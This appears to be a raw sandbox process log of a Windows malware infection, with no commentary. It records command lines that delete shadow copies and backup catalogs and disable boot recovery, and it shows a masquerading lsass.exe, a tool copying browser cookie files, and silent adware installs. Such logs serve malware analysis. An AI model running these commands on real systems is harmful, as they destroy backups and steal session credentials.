"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b8,0x1e8,0x7ffef13646f8,0x7ffef1364708,0x7ffef1364718
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lhnbi1b1.naw\GcleanerEU.exe /eufive & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1996 /prefetch:1
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\lhnbi1b1.naw\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\lhnbi1b1.naw\GcleanerEU.exe /eufive
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\30p5ig1s.rd1\installer.exe /qn CAMPAIGN="654" & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3760 /prefetch:1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im MSBuild.exe /f & timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & del C:\ProgramData\*.dll & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yvl3uk3o.5ez\ufgaa.exe & exit
C:\Users\Admin\AppData\Local\Temp\30p5ig1s.rd1\installer.exe
C:\Users\Admin\AppData\Local\Temp\30p5ig1s.rd1\installer.exe /qn CAMPAIGN="654"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\taskkill.exe
taskkill /im MSBuild.exe /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cei014dc.yar\anyname.exe & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3244 -ip 3244
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 296
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding B7D7E475A2104AD7A0CC27C9E0624E51 C
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pgpmxbwc.c50\gcleaner.exe /mixfive & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5844 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\cei014dc.yar\anyname.exe
C:\Users\Admin\AppData\Local\Temp\cei014dc.yar\anyname.exe
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\pgpmxbwc.c50\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\pgpmxbwc.c50\gcleaner.exe /mixfive
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -agent 0
C:\Users\Admin\AppData\Local\Temp\cei014dc.yar\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\cei014dc.yar\anyname.exe" -q
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\30p5ig1s.rd1\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\30p5ig1s.rd1\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4696 -ip 4696
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 292
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 7304 -ip 7304
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7304 -s 452
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y0ooklu2.ky3\autosubplayer.exe /S & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\notepad.exe
notepad.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_C869.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1bc,0x210,0x7fff033edec0,0x7fff033eded0,0x7fff033edee0
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff6b83d9e70,0x7ff6b83d9e80,0x7ff6b83d9e90
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1572,5692544502558156176,3928667644785607089,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9212_1942838658" --mojo-platform-channel-handle=1852 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1572,5692544502558156176,3928667644785607089,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9212_1942838658" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1592 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1572,5692544502558156176,3928667644785607089,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9212_1942838658" --mojo-platform-channel-handle=2440 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1572,5692544502558156176,3928667644785607089,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9212_1942838658" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2572 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1572,5692544502558156176,3928667644785607089,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9212_1942838658" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2564 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,5692544502558156176,3928667644785607089,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9212_1942838658" --mojo-platform-channel-handle=3284 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1572,5692544502558156176,3928667644785607089,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9212_1942838658" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3336 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,5692544502558156176,3928667644785607089,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9212_1942838658" --mojo-platform-channel-handle=3860 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,5692544502558156176,3928667644785607089,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9212_1942838658" --mojo-platform-channel-handle=3920 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
